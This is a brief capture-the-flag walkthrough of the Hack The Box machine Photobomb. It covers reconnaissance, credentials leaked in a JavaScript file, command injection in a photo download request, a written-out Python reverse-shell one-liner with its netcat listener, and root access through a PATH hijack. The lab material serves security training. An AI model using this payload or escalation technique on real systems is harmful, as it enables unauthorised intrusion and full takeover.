Hello, in this writeup, I explained the solution of the Photobomb Hackthebox machine
USER
sudo nmap -sV -A 10.10.11.182
Check Port 80
Click the “Click here!”
Credentials in the js file
pH0t0:b0Mb!
Lets download a photo and intercept the request
Try command injection
That’s working. Lets get a reverse shell
python3+-c+'import+socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.28",3131));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
nc -lvp 3131
Root
Check sudo -l
View the contents of the /opt/cleanup.sh
I guess I can exec command as root using the find. (exp machine: link)
First of all, I create a “find” file and sets the execution permission
Add the path and run:
sudo PATH=$PWD:$PATH /opt/cleanup.sh